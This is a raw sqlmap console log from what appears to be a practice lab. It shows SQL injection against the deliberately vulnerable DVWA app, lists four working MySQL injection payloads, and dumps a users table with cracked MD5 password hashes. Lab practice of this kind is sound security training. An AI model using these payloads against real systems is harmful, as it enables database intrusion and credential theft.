        ___
       __H__
 ___ ___["]_____ ___ ___  {1.9.9#stable}
|_ -| . [.]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:39:07 /2025-10-13/

[09:39:07] [INFO] parsing HTTP request from 'request.txt'
[09:39:08] [INFO] resuming back-end DBMS 'mysql' 
[09:39:08] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 9537=9537#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 7684 FROM(SELECT COUNT(*),CONCAT(0x71626a7171,(SELECT (ELT(7684=7684,1))),0x7176787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- vAJg&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 6700 FROM (SELECT(SLEEP(5)))ffXe)-- mOit&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x71626a7171,0x6b59784362544e4344516b4551786563426f5968734f7a7a507a716c494f7049614a6e4d46634e6e,0x7176787871)#&Submit=Submit
---
[09:39:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: Apache 2.2.14, PHP 5.3.2
back-end DBMS: MySQL >= 5.0
[09:39:08] [INFO] fetching entries of column(s) '`user`,password,user_id' for table 'users' in database 'dvwa'
[09:39:08] [WARNING] reflective value(s) found and filtering out
[09:39:08] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[09:39:08] [INFO] using hash method 'md5_generic_passwd'
[09:39:08] [INFO] resuming password 'admin' for hash '21232f297a57a5a743894a0e4a801fc3'
[09:39:08] [INFO] resuming password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
[09:39:08] [INFO] resuming password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'
[09:39:08] [INFO] resuming password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'
[09:39:08] [INFO] resuming password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
[09:39:08] [INFO] resuming password 'user' for hash 'ee11cbb19052e40b07aac0ca060c23ee'
Database: dvwa
Table: users
[6 entries]
+---------+---------+---------------------------------------------+
| user_id | user    | password                                    |
+---------+---------+---------------------------------------------+
| 1       | admin   | 21232f297a57a5a743894a0e4a801fc3 (admin)    |
| 2       | gordonb | e99a18c428cb38d5f260853678922e03 (abc123)   |
| 3       | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |
| 4       | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |
| 5       | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
| 6       | user    | ee11cbb19052e40b07aac0ca060c23ee (user)     |
+---------+---------+---------------------------------------------+

[09:39:08] [INFO] table 'dvwa.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.132.130/dump/dvwa/users.csv'
[09:39:08] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.132.130'

[*] ending @ 09:39:08 /2025-10-13/

